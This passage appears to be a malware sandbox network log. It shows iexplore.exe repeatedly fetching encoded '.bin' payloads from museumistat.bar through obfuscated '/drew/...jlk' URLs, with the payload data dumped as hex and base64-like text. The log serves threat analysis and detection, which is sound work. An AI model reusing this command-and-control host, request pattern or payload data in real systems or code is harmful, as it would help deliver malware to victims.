                  Data Raw: 65 57 49 79 65 68 39 31 50 42 42 6e 31 56 6a 36 65 34 4d 6f 4e 62 59 6d 76 6c 58 30 4e 30 4b 6f 6f 34 4a 33 76 41 47 76 31 69 5a 61 7a 7a 50 34 46 48 38 39 6c 4a 63 78 30 2f 74 36 70 58 36 57 67 53 77 6c 72 6a 68 4d 74 42 37 47 72 65 7a 4e 66 37 73 4e 30 64 6c 44 69 6b 70 65 5a 33 2b 44 35 2f 64 2f 50 6e 37 5a 33 6a 30 6a 51 33 79 49 66 6e 32 63 71 4f 6e 35 41 66 5a 61 63 31 31 4e 4a 79 57 68 74 55 76 6a 4e 42 42 42 51 63 6a 5a 67 73 48 48 62 75 33 74 4c 2b 62 63 55 43 4a 5a 42 72 37 59 57 48 41 6f 63 2f 79 7a 32 65 75 67 4a 79 71 79 4f 30 42 6a 64 33 53 59 52 4c 63 56 74 53 62 4f 61 46 33 5a 39 70 63 30 2b 50 70 4b 71 73 6c 73 73 6d 51 6e 64 49 59 55 2b 73 72 30 35 35 77 6e 5a 44 61 6e 69 4f 56 71 30 46 46 48 65 6a 59 66 4d 4d 38 74 53 43 41 50 6d 6b 4f 73 4c 4d 6f 54 6b 36 37 66 68 54 53 47 47 6e 2f 59 2f 43 41 72 57 58 51 69 79 4d 4d 47 74 4b 39 4f 48 59 63 41 30 78 57 47 62 73 78 7a 4e 70 42 6d 68 4c 49 79 59 41 2f 73 73 7a 6b 6e 32 52 67 4f 59 61 39 65 52 67 56 7a 71 75 42 2b 63 47 41 4a 4a 51 49 4a 66 6d 4d 33 73 6f 4d 50 30 6e 78 6e 33 52 48 6f 43 63 4c 37 65 56 63 53 59 43 34 6f 51 64 4d 2b 34 6d 75 46 6e 4b 6a 35 52 5a 62 2b 52 67 43 50 6f 52 74 61 62 31 77 66 63 32 4a 46 57 58 66 2f 6b 78 58 46 34 2f 2b 38 34 32 42 65 44 53 2b 78 32 43 36 61 65 5a 4a 6a 37 6f 63 79 4f 72 54 66 64 77 58 56 56 34 39 47 56 36 41 4f 77 6e 70 42 46 76 2f 62 68 71 65 64 4a 53 59 57 64 4c 56 35 67 59 6c 48 54 44 36 57 67 62 64 75 71 37 46 47 56 70 59 48 53 61 6c 72 4b 7a 4d 38 59 61 67 62 49 79 6b 48 48 33 6c 2b 68 6f 4a 71 6a 6c 5a 32 51 33 56 4e 58 2b 4b 6e 67 58 38 32 63 4e 6c 43 2b 43 69 41 47 57 59 48 34 48 2f 53 74 66 37 45 47 66 36 50 31 68 61 4a 79 36 79 4f 76 57 45 33 54 77 75 6a 76 67 76 56 6d 4b 72 5a 69 47 58 75 57 42 4b 38 6c 43 4e 6f 6d 47 66 77 54 6e 46 45 79 7a 48 74 58 73 43 58 31 46 38 74 32 69 50 32 72 79 6b 6d 72 30 49 33 77 4c 5a 73 71 4c 43 75 48 2f 54 72 53 51 39 41 6a 4c 53 6d 4f 75 43 74 38 58 53 35 5a 6c 79 31 4c 53 7a 45 79 61 61 7a 36 78 56 31 66 57 6b 48 71 70 31 62 4c 76 53 77 54 63 66 4b 37 2f 32 54 6d 66 2b 42 36 58 34 63 6f 57 57 30 43 44 4f 2f 33 72 79 70 34 78 72 38 43 64 56 71 78 45 6b 4c 61 66 6f 63 61 67 42 2b 48 6e 5a 71 35 6a 68 49 70 34 4c 4f 52 39 46 71 6d 56 4b 38 61 52 57 38 68 41 69 52 4f 57 42 2b 6c 46 50 4a 6b 54 71 73 30 6a 39 4f 68 46 47 74 39 41 4c 4f 62 35 33 64 59 64 39 33 45 32 5a 6f 55 4d 69 58 68 64 56 68 2b 73 65 4f 43 62 50 4a 32 4b 49 79 4d 57 48 4a 4c 38 62 2b 30 78 52 31 4c 56 38 74 5a 70 58 58 78 4b 75 79 46 32 39 49 63 33 6b 49 41 70 4d 4e 76 70 66 32 61 56 6d 6b 4e 5a 39 78 69 75 74 4e 78 30 31 6e 2f 48 72 6e 54 6a 56 78 47 59 58 44 50 43 59 4a 6b 6d 38 35 6c 74 30 4a 43 6f 79 2b 2b 72 79 42 6c 78 35 71 37 6d 33 44 45 79 41 42 42 4e 6d 2f 4b 38 78 49 50 4b 63 6b 65 4a 4d 50 6c 6a 68 4f 63 57 63 6e 53 38 64 43 4e 31 62 6b 37 6b 4e 69 54 62 30 4f 32 74 48 62 4b 4d 4b 4c 33 43 61 71 68 47 7a 47 47 51 4d 4e 54 44 6f 72 45 73 57 4b 44 64 2b 33 38 57 36 75 73 69 6d 4b 35 51 2f 41 39 41 37
                  Data Ascii: eWIyeh91PBBn1Vj6e4MoNbYmvlX0N0Koo4J3vAGv1iZazzP4FH89lJcx0/t6pX6WgSwlrjhMtB7GrezNf7sN0dlDikpeZ3+D5/d/Pn7Z3j0jQ3yIfn2cqOn5AfZac11NJyWhtUvjNBBBQcjZgsHHbu3tL+bcUCJZBr7YWHAoc/yz2eugJyqyO0Bjd3SYRLcVtSbOaF3Z9pc0+PpKqslssmQndIYU+sr055wnZDaniOVq0FFHejYfMM8tSCAPmkOsLMoTk67fhTSGGn/Y/CArWXQiyMMGtK9OHYcA0xWGbsxzNpBmhLIyYA/sszkn2RgOYa9eRgVzquB+cGAJJQIJfmM3soMP0nxn3RHoCcL7eVcSYC4oQdM+4muFnKj5RZb+RgCPoRtab1wfc2JFWXf/kxXF4/+842BeDS+x2C6aeZJj7ocyOrTfdwXVV49GV6AOwnpBFv/bhqedJSYWdLV5gYlHTD6Wgbduq7FGVpYHSalrKzM8YagbIykHH3l+hoJqjlZ2Q3VNX+KngX82cNlC+CiAGWYH4H/Stf7EGf6P1haJy6yOvWE3TwujvgvVmKrZiGXuWBK8lCNomGfwTnFEyzHtXsCX1F8t2iP2rykmr0I3wLZsqLCuH/TrSQ9AjLSmOuCt8XS5Zly1LSzEyaaz6xV1fWkHqp1bLvSwTcfK7/2Tmf+B6X4coWW0CDO/3ryp4xr8CdVqxEkLafocagB+HnZq5jhIp4LOR9FqmVK8aRW8hAiROWB+lFPJkTqs0j9OhFGt9ALOb53dYd93E2ZoUMiXhdVh+seOCbPJ2KIyMWHJL8b+0xR1LV8tZpXXxKuyF29Ic3kIApMNvpf2aVmkNZ9xiutNx01n/HrnTjVxGYXDPCYJkm85lt0JCoy++ryBlx5q7m3DEyABBNm/K8xIPKckeJMPljhOcWcnS8dCN1bk7kNiTb0O2tHbKMKL3CaqhGzGGQMNTDorEsWKDd+38W6usimK5Q/A9A7
                  Jan 19, 2022 11:50:36.812525034 CET2935OUTGET /drew/DZcSXh7Ng_2FsV0UJ_2F3/GRst_2FHsmEUpTdn/IlRoWuXOQz6AvVB/oHCRIZwCXdu19fzTF6/IJnk9pqyt/R7YThfxVvXjPoTFVxdIp/9ZSBIRr8aNwCdcqsbSD/ubGl_2FCIQSLMzyQKYuoWo/1iFBN06iwUsUZ/fYXG9Rb_/2BfTgXtLPmMRPeRvowhbSh5/36HMJRHO8b/OSGBdiiAUHsyPYUFc/lxohA008GtqJ/Nc8_2BFhn82/lm9LjrPDHsuz/X.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:37.178613901 CET3157INHTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:37 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 2416
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ecfd1c2f6.bin"
                  Data Raw: 53 69 37 30 45 70 58 46 33 44 74 4b 45 54 52 70 2b 5a 47 59 32 54 78 45 4a 6d 41 74 33 51 6f 74 4f 49 36 65 38 6e 69 54 30 43 45 51 77 6d 55 4b 39 6e 77 53 4b 49 44 6d 38 59 79 33 49 58 48 75 71 53 6a 4a 65 36 58 6d 48 4e 79 44 4d 2b 72 66 39 51 6e 53 78 4a 46 4b 49 50 39 74 52 52 73 6f 6b 49 45 78 4d 46 51 70 43 4f 55 38 55 4a 64 39 31 4d 31 53 6a 54 66 62 6c 69 45 4b 2b 68 41 7a 6c 37 42 6a 5a 32 30 57 42 70 49 50 2b 53 6d 77 56 70 69 31 67 62 72 55 4b 50 42 52 56 50 6f 64 77 37 44 5a 35 6c 62 4c 7a 4b 6f 48 54 65 34 5a 54 76 42 6c 53 42 70 75 6a 54 45 75 4d 72 2f 44 30 44 38 39 6a 4d 6d 7a 4a 70 62 68 44 48 57 65 70 62 35 78 63 75 78 5a 72 4b 5a 65 51 47 33 43 4a 6d 41 6e 35 4a 69 53 38 69 63 33 66 74 74 70 6a 6a 49 4a 33 59 70 73 61 6b 45 75 46 51 59 6c 4e 78 68 42 2b 32 49 62 46 2f 71 4e 73 77 49 2f 49 64 7a 6c 57 52 46 42 62 54 4d 7a 47 66 31 62 4e 79 36 76 31 4b 79 34 51 56 36 65 4a 77 4e 6a 73 6c 6c 4c 30 39 69 50 6b 78 30 52 76 59 37 75 64 7a 33 31 30 55 7a 66 7a 6d 68 46 4c 65 46 41 59 37 79 74 6c 37 35 7a 59 48 6c 54 55 69 2b 30 4f 6e 4c 57 45 63 38 46 75 73 61 6e 6d 2b 57 46 73 79 56 56 44 59 75 68 66 62 5a 69 4a 63 6e 44 4b 57 31 43 54 6a 61 38 49 37 53 71 76 51 35 52 59 4d 46 47 43 68 6d 4b 34 58 47 2b 63 6e 38 76 64 76 77 47 77 39 51 32 61 37 69 4d 79 77 47 32 67 56 69 6c 47 63 73 32 2b 66 6c 45 43 67 56 52 62 44 4e 67 6f 2f 30 36 6d 33 4e 42 74 73 54 45 42 74 63 64 49 4c 46 49 2f 30 6b 52 4e 38 4c 58 76 71 5a 4a 65 2b 65 4c 39 5a 61 58 2f 5a 35 6d 47 77 55 45 2b 2b 6a 76 45 51 4f 64 6d 71 34 47 71 33 64 6d 49 73 42 57 79 45 72 50 62 59 30 4c 7a 56 79 6f 45 79 49 41 51 42 74 38 67 2b 72 73 7a 6c 6c 61 58 38 69 32 34 45 55 49 44 69 74 5a 49 41 48 43 4d 70 78 33 56 55 53 75 76 6b 6a 61 43 2f 2f 75 7a 43 65 53 6a 6c 36 66 78 4b 67 30 70 55 62 63 4e 6f 54 52 44 67 67 38 42 35 58 65 50 38 78 69 4b 5a 36 52 44 6f 62 6e 35 65 33 55 2b 58 69 45 49 6d 52 56 4a 65 78 6f 55 63 65 46 49 72 30 69 6e 2f 42 35 62 30 6a 39 62 75 6a 6e 61 34 30 72 78 57 50 39 6a 4b 37 57 68 30 65 56 53 45 7a 30 52 56 41 43 34 6a 46 32 54 37 75 4d 38 41 34 59 4c 68 70 57 59 35 56 33 4c 4d 37 4e 47 76 6f 61 41 6f 70 35 4d 45 6b 72 37 53 57 43 39 4d 69 45 42 31 43 4a 48 63 32 57 4b 6e 76 37 75 37 69 2f 53 4d 52 77 75 72 6a 6f 76 34 4d 57 79 4d 46 70 73 2f 73 62 30 2b 48 6e 7a 37 47 36 41 61 34 48 32 67 65 33 34 69 7a 34 36 4e 43 4b 43 6a 4d 51 72 73 38 72 75 55 4a 6e 70 54 59 32 4a 74 56 48 73 44 68 39 67 2b 74 32 47 78 55 37 6e 45 2f 79 64 59 69 6a 70 74 47 50 34 59 33 67 52 76 5a 4e 5a 52 56 46 71 6a 79 46 45 37 48 71 71 39 6c 52 65 58 4a 4d 4f 73 68 71 33 33 47 2f 73 39 50 67 37 66 31 4c 71 53 6b 6a 36 31 54 42 4f 38 6f 47 58 38 31 45 69 68 78 69 30 51 77 73 70 71 41 4f 31 66 47 35 62 68 54 43 45 49 61 57 30 53 70 43 67 43 35 6a 48 61 41 45 49 64 56 65 41 55 55 32 44 6f 52 37 5a 72 66 75 41 54 6c 6d 42 2f 4a 67 52 38 2b 6c 7a 55 51 75 64 79 6d 72 35 53 79 52 41 4e 57 4a 5a 56 66 73 32 31 31 73 58 6f 41 56 58 45 42 6b 76 49 77 36 64 37 35 30 73 75 55 47 76
                  Data Ascii: Si70EpXF3DtKETRp+ZGY2TxEJmAt3QotOI6e8niT0CEQwmUK9nwSKIDm8Yy3IXHuqSjJe6XmHNyDM+rf9QnSxJFKIP9tRRsokIExMFQpCOU8UJd91M1SjTfbliEK+hAzl7BjZ20WBpIP+SmwVpi1gbrUKPBRVPodw7DZ5lbLzKoHTe4ZTvBlSBpujTEuMr/D0D89jMmzJpbhDHWepb5xcuxZrKZeQG3CJmAn5JiS8ic3fttpjjIJ3YpsakEuFQYlNxhB+2IbF/qNswI/IdzlWRFBbTMzGf1bNy6v1Ky4QV6eJwNjsllL09iPkx0RvY7udz310UzfzmhFLeFAY7ytl75zYHlTUi+0OnLWEc8Fusanm+WFsyVVDYuhfbZiJcnDKW1CTja8I7SqvQ5RYMFGChmK4XG+cn8vdvwGw9Q2a7iMywG2gVilGcs2+flECgVRbDNgo/06m3NBtsTEBtcdILFI/0kRN8LXvqZJe+eL9ZaX/Z5mGwUE++jvEQOdmq4Gq3dmIsBWyErPbY0LzVyoEyIAQBt8g+rszllaX8i24EUIDitZIAHCMpx3VUSuvkjaC//uzCeSjl6fxKg0pUbcNoTRDgg8B5XeP8xiKZ6RDobn5e3U+XiEImRVJexoUceFIr0in/B5b0j9bujna40rxWP9jK7Wh0eVSEz0RVAC4jF2T7uM8A4YLhpWY5V3LM7NGvoaAop5MEkr7SWC9MiEB1CJHc2WKnv7u7i/SMRwurjov4MWyMFps/sb0+Hnz7G6Aa4H2ge34iz46NCKCjMQrs8ruUJnpTY2JtVHsDh9g+t2GxU7nE/ydYijptGP4Y3gRvZNZRVFqjyFE7Hqq9lReXJMOshq33G/s9Pg7f1LqSkj61TBO8oGX81Eihxi0QwspqAO1fG5bhTCEIaW0SpCgC5jHaAEIdVeAUU2DoR7ZrfuATlmB/JgR8+lzUQudymr5SyRANWJZVfs211sXoAVXEBkvIw6d750suUGv


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  3192.168.2.34975431.41.44.380C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 19, 2022 11:50:32.735749960 CET1706OUTGET /drew/m4PVNjgat1g0/6_2Btp70Ci0/aungsV13kBUs5a/u2A8XHXxV0G6qtvrny9S2/1bGzk7HyzbfK_2FU/H_2BzwQBI0CSjs2/U1xYaVr4zjQvZiLchv/4aLCBz0CM/68jv0usMkhT2JOF9ESfc/julfpSuq9tErtsl1vT0/5cBxjWFbHYxsgooRJoWIHy/X7bt5vrbFueOy/GXHEBf2y/a48Hwj5cem9DF_2FgVMHxJc/2BxgNa1_2B/9wP6Mz_2F/66hqNdd.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:33.052546024 CET1720INHTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:33 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 246652
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ecf8f3a99.bin"
                  Data Raw: 51 59 47 5a 59 79 39 48 57 2f 73 4e 35 51 6a 64 42 41 75 6e 54 4e 71 74 75 73 6d 32 4c 43 54 4e 33 4c 65 52 49 53 65 79 78 6e 48 74 67 31 30 6e 6a 6e 52 69 48 78 38 4c 69 67 65 37 2b 7a 51 4c 32 57 38 65 39 61 75 43 61 4a 41 70 64 41 2b 43 34 56 52 31 38 6a 37 38 63 5a 32 6d 50 65 4f 59 75 76 61 51 44 35 52 67 36 54 4d 33 41 41 74 74 58 64 5a 74 64 62 42 42 36 79 6b 6d 4f 30 77 75 47 6a 75 42 59 39 6c 47 45 2b 70 4a 45 74 56 74 45 38 4c 6b 56 72 57 59 76 34 6d 78 67 31 42 51 4e 57 59 72 6c 6f 78 63 77 69 54 32 2b 37 64 2b 74 79 59 58 69 6f 76 70 55 6f 53 6f 4c 51 54 4c 2b 66 32 45 79 62 6a 58 31 45 33 72 4d 65 34 54 36 46 2b 52 42 4a 50 55 57 76 31 50 31 4a 4a 66 70 50 63 2f 41 72 32 36 48 34 2f 66 4d 69 65 6f 6c 64 61 45 65 45 36 4f 5a 61 79 65 61 4a 39 65 49 78 4e 44 4f 37 44 37 63 2f 52 77 2f 67 30 72 74 4a 5a 42 64 35 37 48 38 73 6e 51 56 54 34 35 6b 43 65 74 4c 51 68 4a 49 4e 33 6f 2f 73 7a 6b 41 4e 45 55 42 36 61 49 50 68 51 73 42 4e 6a 52 63 59 79 4c 63 31 33 33 71 30 79 7a 45 6f 79 6b 79 6f 66 72 54 72 54 51 34 51 6f 48 54 39 32 31 4f 68 64 49 37 4e 30 71 49 65 7a 62 77 43 66 71 54 38 56 46 63 43 32 33 59 6a 58 5a 37 5a 56 55 46 5a 75 49 49 6c 39 30 59 39 4b 75 79 76 53 36 35 75 36 58 67 7a 4e 51 74 35 48 4d 47 4f 46 59 70 6d 66 6c 4f 69 66 68 2b 49 7a 41 4d 72 54 30 33 49 71 54 43 50 64 4f 68 57 45 70 6a 62 6b 4a 63 35 6b 4b 75 55 51 73 51 6c 61 52 6f 55 33 36 49 41 56 33 6f 68 42 6e 31 49 6d 49 46 59 32 6c 65 71 52 35 54 6c 51 39 5a 4f 48 61 45 48 61 36 51 4e 67 6e 45 47 36 78 62 6e 4e 4a 32 2b 55 59 37 4a 69 44 69 51 6a 42 5a 72 43 62 37 2b 47 68 78 6e 5a 53 46 68 74 66 41 63 4d 55 32 58 63 47 77 77 56 32 75 4a 6f 49 78 74 37 76 4c 38 46 39 54 6c 68 52 4d 6d 41 2f 52 7a 52 36 56 74 38 78 5a 66 39 52 6b 52 33 65 31 70 39 74 6f 46 5a 33 6f 34 63 48 59 55 76 33 49 6e 57 43 71 50 73 42 6e 6f 6a 48 38 78 45 4d 30 56 62 6a 68 65 42 58 6f 61 78 68 42 51 39 5a 36 2f 66 78 6e 2f 32 48 63 58 72 62 31 63 38 69 62 36 6c 75 45 4b 6e 57 64 43 4c 36 75 7a 6c 48 7a 63 42 6b 4d 61 4f 44 44 30 59 5a 63 70 6b 69 57 73 2f 36 73 67 59 49 61 46 33 64 59 6f 52 5a 51 59 44 55 52 4e 36 76 4c 7a 42 74 58 74 5a 4d 42 61 55 57 72 6f 68 51 64 54 64 6e 34 75 7a 4a 6a 63 6e 77 42 4c 6e 76 50 79 4f 2b 54 46 75 43 4e 6a 58 4d 69 54 32 47 79 2f 6a 2f 48 70 33 6c 57 58 66 52 48 6f 6a 6a 65 68 70 4f 63 4a 61 70 57 69 75 70 6e 61 64 62 71 75 78 47 6e 36 30 58 68 6c 45 61 77 4a 63 62 30 70 39 73 74 79 7a 4d 36 6f 63 61 43 41 64 74 4f 56 74 76 48 48 37 4e 65 52 51 74 73 2b 68 4a 35 47 50 38 30 56 76 31 5a 63 2f 58 72 33 6c 55 6c 6a 4f 31 64 75 74 79 76 6a 37 72 75 64 72 36 67 6a 69 39 56 31 45 6a 31 35 32 75 65 51 77 55 41 33 68 6a 43 4d 64 70 47 47 78 72 6e 57 63 78 71 50 54 74 49 71 53 47 36 51 56 56 38 70 75 5a 50 53 56 35 4b 38 75 44 46 43 53 31 51 2f 4a 63 45 2b 76 6c 73 54 52 50 74 49 43 48 72 75 34 44 38 4b 4e 2f 67 4e 66 6d 4c 59 36 4b 6c 59 30 77 2f 75 55 61 35 61 48 45 6a 68 61 44 6c 56 62 6f 2b 4e 7a 30 51 56 6e 2b 48 45 2f 6d 4c 37 6f 72 37 67 44
                  Data Ascii: QYGZYy9HW/sN5QjdBAunTNqtusm2LCTN3LeRISeyxnHtg10njnRiHx8Lige7+zQL2W8e9auCaJApdA+C4VR18j78cZ2mPeOYuvaQD5Rg6TM3AAttXdZtdbBB6ykmO0wuGjuBY9lGE+pJEtVtE8LkVrWYv4mxg1BQNWYrloxcwiT2+7d+tyYXiovpUoSoLQTL+f2EybjX1E3rMe4T6F+RBJPUWv1P1JJfpPc/Ar26H4/fMieoldaEeE6OZayeaJ9eIxNDO7D7c/Rw/g0rtJZBd57H8snQVT45kCetLQhJIN3o/szkANEUB6aIPhQsBNjRcYyLc133q0yzEoykyofrTrTQ4QoHT921OhdI7N0qIezbwCfqT8VFcC23YjXZ7ZVUFZuIIl90Y9KuyvS65u6XgzNQt5HMGOFYpmflOifh+IzAMrT03IqTCPdOhWEpjbkJc5kKuUQsQlaRoU36IAV3ohBn1ImIFY2leqR5TlQ9ZOHaEHa6QNgnEG6xbnNJ2+UY7JiDiQjBZrCb7+GhxnZSFhtfAcMU2XcGwwV2uJoIxt7vL8F9TlhRMmA/RzR6Vt8xZf9RkR3e1p9toFZ3o4cHYUv3InWCqPsBnojH8xEM0VbjheBXoaxhBQ9Z6/fxn/2HcXrb1c8ib6luEKnWdCL6uzlHzcBkMaODD0YZcpkiWs/6sgYIaF3dYoRZQYDURN6vLzBtXtZMBaUWrohQdTdn4uzJjcnwBLnvPyO+TFuCNjXMiT2Gy/j/Hp3lWXfRHojjehpOcJapWiupnadbquxGn60XhlEawJcb0p9styzM6ocaCAdtOVtvHH7NeRQts+hJ5GP80Vv1Zc/Xr3lUljO1dutyvj7rudr6gji9V1Ej152ueQwUA3hjCMdpGGxrnWcxqPTtIqSG6QVV8puZPSV5K8uDFCS1Q/JcE+vlsTRPtICHru4D8KN/gNfmLY6KlY0w/uUa5aHEjhaDlVbo+Nz0QVn+HE/mL7or7gD
                  Jan 19, 2022 11:50:34.932451010 CET2229OUTGET /drew/WscgLp0a9mza4KVSZP_2F/qW_2BiGKRm2pEjNT/0yit17kTcYKALfY/Dca3d6njS6Q8Up7_2B/S1Q5c3m1L/htfRX_2FNP4zOUbJdHE0/XcLw_2FUradRuvSZYkz/0N0BHZth_2BNigSkIsxFbw/Kr0gcIwYitNQb/vtve9mnb/uJ6GCaAgncMj3aalqD8JgFA/MTnXx5EVkL/iZOp4aPFrTK2CzYfp/vJg2ovriq7si/LWFvH6yBaQn/MYMUZGLdg/H3Ww.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:35.253115892 CET2437INHTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:35 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 315596
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ecfb30839.bin"
                  Data Raw: 65 57 49 79 65 68 39 31 50 42 42 6e 31 56 6a 36 65 34 4d 6f 4e 62 59 6d 76 6c 58 30 4e 30 4b 6f 6f 34 4a 33 76 41 47 76 31 69 5a 61 7a 7a 50 34 46 48 38 39 6c 4a 63 78 30 2f 74 36 70 58 36 57 67 53 77 6c 72 6a 68 4d 74 42 37 47 72 65 7a 4e 66 37 73 4e 30 64 6c 44 69 6b 70 65 5a 33 2b 44 35 2f 64 2f 50 6e 37 5a 33 6a 30 6a 51 33 79 49 66 6e 32 63 71 4f 6e 35 41 66 5a 61 63 31 31 4e 4a 79 57 68 74 55 76 6a 4e 42 42 42 51 63 6a 5a 67 73 48 48 62 75 33 74 4c 2b 62 63 55 43 4a 5a 42 72 37 59 57 48 41 6f 63 2f 79 7a 32 65 75 67 4a 79 71 79 4f 30 42 6a 64 33 53 59 52 4c 63 56 74 53 62 4f 61 46 33 5a 39 70 63 30 2b 50 70 4b 71 73 6c 73 73 6d 51 6e 64 49 59 55 2b 73 72 30 35 35 77 6e 5a 44 61 6e 69 4f 56 71 30 46 46 48 65 6a 59 66 4d 4d 38 74 53 43 41 50 6d 6b 4f 73 4c 4d 6f 54 6b 36 37 66 68 54 53 47 47 6e 2f 59 2f 43 41 72 57 58 51 69 79 4d 4d 47 74 4b 39 4f 48 59 63 41 30 78 57 47 62 73 78 7a 4e 70 42 6d 68 4c 49 79 59 41 2f 73 73 7a 6b 6e 32 52 67 4f 59 61 39 65 52 67 56 7a 71 75 42 2b 63 47 41 4a 4a 51 49 4a 66 6d 4d 33 73 6f 4d 50 30 6e 78 6e 33 52 48 6f 43 63 4c 37 65 56 63 53 59 43 34 6f 51 64 4d 2b 34 6d 75 46 6e 4b 6a 35 52 5a 62 2b 52 67 43 50 6f 52 74 61 62 31 77 66 63 32 4a 46 57 58 66 2f 6b 78 58 46 34 2f 2b 38 34 32 42 65 44 53 2b 78 32 43 36 61 65 5a 4a 6a 37 6f 63 79 4f 72 54 66 64 77 58 56 56 34 39 47 56 36 41 4f 77 6e 70 42 46 76 2f 62 68 71 65 64 4a 53 59 57 64 4c 56 35 67 59 6c 48 54 44 36 57 67 62 64 75 71 37 46 47 56 70 59 48 53 61 6c 72 4b 7a 4d 38 59 61 67 62 49 79 6b 48 48 33 6c 2b 68 6f 4a 71 6a 6c 5a 32 51 33 56 4e 58 2b 4b 6e 67 58 38 32 63 4e 6c 43 2b 43 69 41 47 57 59 48 34 48 2f 53 74 66 37 45 47 66 36 50 31 68 61 4a 79 36 79 4f 76 57 45 33 54 77 75 6a 76 67 76 56 6d 4b 72 5a 69 47 58 75 57 42 4b 38 6c 43 4e 6f 6d 47 66 77 54 6e 46 45 79 7a 48 74 58 73 43 58 31 46 38 74 32 69 50 32 72 79 6b 6d 72 30 49 33 77 4c 5a 73 71 4c 43 75 48 2f 54 72 53 51 39 41 6a 4c 53 6d 4f 75 43 74 38 58 53 35 5a 6c 79 31 4c 53 7a 45 79 61 61 7a 36 78 56 31 66 57 6b 48 71 70 31 62 4c 76 53 77 54 63 66 4b 37 2f 32 54 6d 66 2b 42 36 58 34 63 6f 57 57 30 43 44 4f 2f 33 72 79 70 34 78 72 38 43 64 56 71 78 45 6b 4c 61 66 6f 63 61 67 42 2b 48 6e 5a 71 35 6a 68 49 70 34 4c 4f 52 39 46 71 6d 56 4b 38 61 52 57 38 68 41 69 52 4f 57 42 2b 6c 46 50 4a 6b 54 71 73 30 6a 39 4f 68 46 47 74 39 41 4c 4f 62 35 33 64 59 64 39 33 45 32 5a 6f 55 4d 69 58 68 64 56 68 2b 73 65 4f 43 62 50 4a 32 4b 49 79 4d 57 48 4a 4c 38 62 2b 30 78 52 31 4c 56 38 74 5a 70 58 58 78 4b 75 79 46 32 39 49 63 33 6b 49 41 70 4d 4e 76 70 66 32 61 56 6d 6b 4e 5a 39 78 69 75 74 4e 78 30 31 6e 2f 48 72 6e 54 6a 56 78 47 59 58 44 50 43 59 4a 6b 6d 38 35 6c 74 30 4a 43 6f 79 2b 2b 72 79 42 6c 78 35 71 37 6d 33 44 45 79 41 42 42 4e 6d 2f 4b 38 78 49 50 4b 63 6b 65 4a 4d 50 6c 6a 68 4f 63 57 63 6e 53 38 64 43 4e 31 62 6b 37 6b 4e 69 54 62 30 4f 32 74 48 62 4b 4d 4b 4c 33 43 61 71 68 47 7a 47 47 51 4d 4e 54 44 6f 72 45 73 57 4b 44 64 2b 33 38 57 36 75 73 69 6d 4b 35 51 2f 41 39 41 37
                  Data Ascii: eWIyeh91PBBn1Vj6e4MoNbYmvlX0N0Koo4J3vAGv1iZazzP4FH89lJcx0/t6pX6WgSwlrjhMtB7GrezNf7sN0dlDikpeZ3+D5/d/Pn7Z3j0jQ3yIfn2cqOn5AfZac11NJyWhtUvjNBBBQcjZgsHHbu3tL+bcUCJZBr7YWHAoc/yz2eugJyqyO0Bjd3SYRLcVtSbOaF3Z9pc0+PpKqslssmQndIYU+sr055wnZDaniOVq0FFHejYfMM8tSCAPmkOsLMoTk67fhTSGGn/Y/CArWXQiyMMGtK9OHYcA0xWGbsxzNpBmhLIyYA/sszkn2RgOYa9eRgVzquB+cGAJJQIJfmM3soMP0nxn3RHoCcL7eVcSYC4oQdM+4muFnKj5RZb+RgCPoRtab1wfc2JFWXf/kxXF4/+842BeDS+x2C6aeZJj7ocyOrTfdwXVV49GV6AOwnpBFv/bhqedJSYWdLV5gYlHTD6Wgbduq7FGVpYHSalrKzM8YagbIykHH3l+hoJqjlZ2Q3VNX+KngX82cNlC+CiAGWYH4H/Stf7EGf6P1haJy6yOvWE3TwujvgvVmKrZiGXuWBK8lCNomGfwTnFEyzHtXsCX1F8t2iP2rykmr0I3wLZsqLCuH/TrSQ9AjLSmOuCt8XS5Zly1LSzEyaaz6xV1fWkHqp1bLvSwTcfK7/2Tmf+B6X4coWW0CDO/3ryp4xr8CdVqxEkLafocagB+HnZq5jhIp4LOR9FqmVK8aRW8hAiROWB+lFPJkTqs0j9OhFGt9ALOb53dYd93E2ZoUMiXhdVh+seOCbPJ2KIyMWHJL8b+0xR1LV8tZpXXxKuyF29Ic3kIApMNvpf2aVmkNZ9xiutNx01n/HrnTjVxGYXDPCYJkm85lt0JCoy++ryBlx5q7m3DEyABBNm/K8xIPKckeJMPljhOcWcnS8dCN1bk7kNiTb0O2tHbKMKL3CaqhGzGGQMNTDorEsWKDd+38W6usimK5Q/A9A7